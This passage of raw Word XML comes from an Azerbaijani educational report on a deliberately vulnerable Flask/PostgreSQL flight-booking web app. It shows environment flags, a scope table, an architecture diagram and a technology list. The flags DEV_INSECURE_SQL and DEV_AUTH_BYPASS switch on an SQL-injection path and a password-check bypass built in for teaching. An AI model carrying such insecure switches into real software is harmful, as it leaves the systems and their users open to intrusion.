              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WEBSEC_LAB=1     ← Default. Bütün lab ssenarilərini aktivləşdirir.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WEBSEC_LAB=0     ← Lab söndürülür; yalnız təhlükəsiz yollar işləyir.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEV_INSECURE_SQL=1  ← SQL injection yolunu aktiv edir.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEV_AUTH_BYPASS=1   ← Parol yoxlamasını atlar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FF6600" w:sz="8"/>
              <w:left w:val="single" w:color="FF6600" w:sz="24"/>
              <w:bottom w:val="single" w:color="FF6600" w:sz="8"/>
              <w:right w:val="single" w:color="FF6600" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="FFF8F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC4400"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Bu layihə istehsal üçün hazır deyil. Zəifliklər yalnız tədris məqsədi üçün bilərəkdən daxil edilmişdir. Real mühitdə WEBSEC_LAB=0 mütləq olmalı, bütün lab kod əlavələri silinməlidir.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4. Layihənin Əhatə Dairəsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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246"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Komponent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Daxildir?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4246"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Qeyd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Backend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4246"/>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Flask, ~880 sətir, 11 endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Verilənlər Bazası</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4246"/>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PostgreSQL, 4 cədvəl, seed data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Frontend UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4246"/>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5 HTML səhifə, çoxdillilik (AZ/RU/EN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Fayl yükləmə</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4246"/>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Genişləmə yoxlaması ilə</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Admin paneli</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4246"/>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Hesabat: uçuşlar + tranzaksiyalar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Deploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4246"/>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Vercel + Neon PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Pentest / aktiv skan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4246"/>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Bu layihənin əhatəsindən kənardır</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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İstehsal auditi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4246"/>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Tədris konteksti — tam audit deyil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Arxitektura və Texnologiyalar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1. Ümumi Arxitektura</w:t>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Layihə klassik üç qatlı (three-tier) arxitektura üzrə qurulmuşdur:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">┌────────────────────────────────────────────┐</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│         BRAUZER  (Presentation Layer)       │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   HTML + CSS + Vanilla JS                  │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   login.html · panel.html · aviakassa.html  │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">└────────────────────┬───────────────────────┘</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     │  HTTP / JSON</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w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│         FLASK  (Logic / Backend)            │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   backend/app.py  →  11 API endpoint        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   Autentifikasiya · Sessiya · DB bağlantısı │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">└────────────────────┬───────────────────────┘</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     │  psycopg2 (SQL)</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w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│         PostgreSQL  (Data Layer)            │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   users · flights · transactions · uploads  │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">│   Neon / Supabase (bulud) və ya lokal       │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">└────────────────────────────────────────────┘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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Birinci qat (Presentation): istifadəçinin gördüyü hissə — HTML səhifələr, CSS stili, JavaScript ilə işləyən formlar. İkinci qat (Logic): Flask serveri; istifadəçidən gələn məlumatı alır, yoxlayır, DB-yə göndərir, nəticəni qaytarır. Üçüncü qat (Data): PostgreSQL; bütün məlumatlar — istifadəçilər, uçuşlar, sifarişlər — burada saxlanılır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2. Kommunikasiya: Client ↔ Server</w:t>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Brauzer ilə server arasında HTTP protokolu üzərindən JSON formatında məlumat mübadiləsi gedir (REST API). İstifadəçi giriş formasını doldurduqda auth.js-dəki fetch() funksiyası POST /api/login çağırır, server isə {"ok": true, "user": {...}} formatında cavab qaytarır. Credentials: "same-origin" parametri sessiyanın tanınması üçün cookie-nin göndərilməsini təmin edir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3. Texnologiyalar Xülasəsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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200"/>
        <w:gridCol w:w="2046"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Texnologiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Versiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rolu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fayl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Python 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Proqramlaşdırma dili</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Flask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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 3.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Veb çərçivəsi, routing, sessiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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backend/app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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psycopg2-binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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 2.9.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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PostgreSQL sürücüsü</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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python-dotenv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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 1.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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.env faylını oxumaq</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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werkzeug.security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Flask ilə gəlir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Parol hash (PBKDF2-SHA256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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15+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Relyasion DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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Neon / Supabase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Vanilla JS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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ES5/ES6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Frontend məntiqi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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auth.js · panel.js · ...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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HTML5 + CSS3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Görünüş, struktur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2046"/>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*.html · style.css</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Vercel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
